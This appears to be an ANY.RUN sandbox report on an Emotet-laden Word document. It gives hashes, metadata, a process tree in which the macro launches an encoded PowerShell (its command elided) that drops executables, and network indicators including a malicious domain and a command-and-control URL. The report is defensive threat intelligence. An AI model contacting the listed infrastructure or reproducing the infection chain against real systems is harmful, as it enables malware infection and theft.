File name: Dok_96648461362_849661809737.doc

Full analysis: https://app.any.run/tasks/43df05b3-6fa7-4b64-8d76-76bca72e9212
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 10:15:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: red connecting, Subject: Human, Author: Mike Effertz, Comments: National zero tolerance Intelligent Fresh Chips, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 843DC73E0488ACC78CED7B9AA4B3E643
SHA1: 87FF766C3BC585AE52F7DDFD189D557B7D353014
SHA256: 0DB51B17F0D92714FDD4A4622D20B084519761A539B211417CE790A47E7D3549
SSDEEP: 6144:zXtY2WaPaQxUk+MclQDgQO+PLkI27NSU4jJntATfD7TPsOuptq:zdY2WaPaQxUk+MclQDgQO8X27NSU4Vef

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 2232)
      • 572.exe (PID: 2420)
      • 572.exe (PID: 3516)
      • 572.exe (PID: 3612)
      • easywindow.exe (PID: 2956)
      • easywindow.exe (PID: 3940)
      • easywindow.exe (PID: 2868)
      • easywindow.exe (PID: 3720)
    • Emotet process was detected

      • 572.exe (PID: 2420)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2448)
    • Creates files in the user directory

      • powershell.exe (PID: 2448)
    • Executed via WMI

      • powershell.exe (PID: 2448)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2448)
      • 572.exe (PID: 2420)
    • Application launched itself

      • 572.exe (PID: 3612)
      • easywindow.exe (PID: 2868)
    • Starts itself from another location

      • 572.exe (PID: 2420)
    • Connects to server without host name

      • easywindow.exe (PID: 3720)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3524)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Greenholt
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Lemke, Becker and Klocko
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:19 06:46:00
CreateDate: 2019:09:19 06:46:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: National zero tolerance Intelligent Fresh Chips
Keywords: -
Author: Mike Effertz
Subject: Human
Title: red connecting
All screenshots are available in the full report
Total processes: 44
Monitored processes: 10
Malicious processes: 4
Suspicious processes: 2

Behavior graph (interactive in the full report; nodes as shown, in launch order): winword.exe (no specs) → powershell.exe → 572.exe (no specs) → 572.exe (no specs) → 572.exe (no specs) → 572.exe (#EMOTET) → easywindow.exe (no specs) → easywindow.exe (no specs) → easywindow.exe (no specs) → easywindow.exe. Edges marked "drop and start" lead from powershell.exe to 572.exe and from 572.exe to easywindow.exe.

Process information

PID 3524 (parent process: explorer.exe)
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dok_96648461362_849661809737.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 2448 (parent process: wmiprvse.exe)
  CMD: powershell -encod <encoded command elided in this report>
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2232 (parent process: powershell.exe)
  CMD: "C:\Users\admin\572.exe"
  Path: C:\Users\admin\572.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3516 (parent process: 572.exe)
  CMD: "C:\Users\admin\572.exe"
  Path: C:\Users\admin\572.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3612 (parent process: 572.exe)
  CMD: --fb4ffeee
  Path: C:\Users\admin\572.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2420 (parent process: 572.exe)
  CMD: --fb4ffeee
  Path: C:\Users\admin\572.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3940 (parent process: 572.exe)
  CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2868 (parent process: easywindow.exe)
  CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2956 (parent process: easywindow.exe)
  CMD: --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3720 (parent process: easywindow.exe)
  CMD: --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Display Control Panel
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 762
Read events: 1 271
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

All files below were written by PID 3524 (WINWORD.EXE).

  • C:\Users\admin\AppData\Local\Temp\CVR9A8F.tmp (type: cvr)
    MD5: -
    SHA256: -
  • C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (type: pgc)
    MD5: 62F2DA178DD59EBA6B61EE250E55F925
    SHA256: 8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
  • C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd (type: tlb)
    MD5: CD5FC43DB795E6983968748C0BD7A9B4
    SHA256: 8AE32EF60B1C82EF0AB3850ABD2D65DF2F7EEAF762AAEDC6DCFF9F5040EAB21A
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B13251.wmf (type: wmf)
    MD5: A04E082846CC22CB09BE6AAD470B7794
    SHA256: 9A976390FDCFECD248020C44881BFC6CC200772643AAEE8844D2149C01EE9547
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64D03435.wmf (type: wmf)
    MD5: 05C986D43E41711FBF7121C053333EBC
    SHA256: 737E48615A83C201889E37B3C8376E8E68336098B4D6230057721DE298447375
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A8642D.wmf (type: wmf)
    MD5: 77ACCAFF288173F58737F7B6B75171C6
    SHA256: B766252B487B3AE3E9FA5F2DA5D4544A348B81F97BB33E18BFC9B4050E5A1DFA
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA9C464F.wmf (type: wmf)
    MD5: B3CBFBEC5054C799F15968D7E66A4884
    SHA256: CDC2F99DE574F1022F5B6D77289CE8E85ED4136118933C3C5C115C2790699BD3
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CE0B987.wmf (type: wmf)
    MD5: 826DCDA5E9E5BB02E73B2A94D4562197
    SHA256: 0FD9208048B2E38F90178EF92F1FB359CBD6DE060550D276F758E3A430295C4C
  • C:\Users\admin\AppData\Local\Temp\~$k_96648461362_849661809737.doc (type: pgc)
    MD5: CCDE3C3754A9D32C62569C95020704DD
    SHA256: 91E32B67E965146C5372AFD470F2F01E91F6DF76F208B0AC9C6BD7EBE47EA3A0
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1E1CDD9.wmf (type: wmf)
    MD5: 5E5B8E20FDF075E6EA83EE6CDFD1F1D7
    SHA256: 288401AC26B243948AB5265DDF78D1FB030AEC457DC9DFB12B2FE076CE878C77
HTTP(S) requests: 1
TCP/UDP connections: 3
DNS requests: 4
Threats: 0

HTTP requests

  • PID 3720, easywindow.exe
    Method: POST
    HTTP Code: -
    IP: 190.18.146.70:80
    URL: http://190.18.146.70/raster/
    CN: AR
    Type: -
    Size: -
    Reputation: malicious

Connections

  • PID 3720, easywindow.exe
    IP: 190.18.146.70:80
    Domain: -
    ASN: CABLEVISION S.A.
    CN: AR
    Reputation: malicious
  • PID 2448, powershell.exe
    IP: 104.28.19.13:443
    Domain: aniventure.co.uk
    ASN: Cloudflare Inc
    CN: US
    Reputation: shared

DNS requests

  • aniventure.co.uk
    IP: 104.28.19.13, 104.28.18.13
    Reputation: malicious
  • dns.msftncsi.com
    IP: 131.107.255.255
    Reputation: shared

Threats

No threats detected
No debug info